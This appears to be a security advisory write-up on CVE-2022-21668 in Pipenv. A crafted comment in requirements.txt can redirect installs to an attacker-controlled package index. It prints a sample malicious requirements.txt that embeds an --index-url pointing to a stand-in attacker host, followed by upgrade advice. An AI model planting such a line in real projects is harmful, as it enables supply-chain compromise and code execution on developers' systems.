CVE-2022-21668 - Remote Code Execution Vulnerability in Pipenv (2018.10.9 - 2022.1.7)

Pipenv, a popular Python development workflow tool, contains a critical security vulnerability that affects versions 2018.10.9 through 2022.1.7. This vulnerability, identified as CVE-2022-21668, allows an attacker to craft a malicious string within a comment in a requirements.txt file. If a victim installs the dependencies in that file using Pipenv, it can lead to remote code execution (RCE) on the victim's system. This vulnerability has been patched in Pipenv version 2022.1.8.

Details

CVE-2022-21668 is a flaw in Pipenv's parsing of requirements.txt files that lets an attacker insert a specially crafted string into a comment within the file. This malicious string can redirect the package installation process to use a package index server controlled by the attacker, allowing them to serve packages containing malicious code.

Example of a malicious requirements.txt file

# This is a comment with a --index-url https://malicious-server.com/simple/ crafted string

django==3.2.9
requests==2.25.1

In this example, the attacker has embedded a --index-url option directing the installation process to their malicious package index server. When the victim installs the dependencies using Pipenv, it will download the packages from the attacker's server. These packages may contain malicious code, which will be executed on the victim's system during installation.

This RCE vulnerability can have severe consequences, providing attackers with a chance to execute any code they want on the target system. It is a serious issue that requires immediate attention and patching.

Here's how the exploit could look like

1. Attacker creates a malicious requirements.txt file with a hidden --index-url option pointing to their malicious package index server.

Victim installs the dependencies in the requirements.txt file using Pipenv.

3. Pipenv downloads the packages from the attacker's malicious package index server and installs them on the victim's system.

Patching

This vulnerability has been patched in Pipenv version 2022.1.8. To resolve this issue, upgrade to the latest version of Pipenv:

pip install --upgrade pipenv

References

- GitHub Security Advisory: CVE-2022-21668 - The official security advisory on GitHub which contains more information about this vulnerability.
- Pipenv documentation - The official documentation for Pipenv, which provides an overview of the tool and its usage.

Conclusion

CVE-2022-21668 is a significant security issue in Pipenv, affecting versions 2018.10.9 through 2022.1.7. This vulnerability allows an attacker to gain remote code execution on the victim's system by exploiting the flaw in Pipenv's parsing of requirements.txt files. Upgrading to Pipenv 2022.1.8 or later is highly recommended to protect against this vulnerability.

Timeline

Published on: 01/10/2022 21:15:00 UTC
Last modified on: 04/25/2022 17:58:00 UTC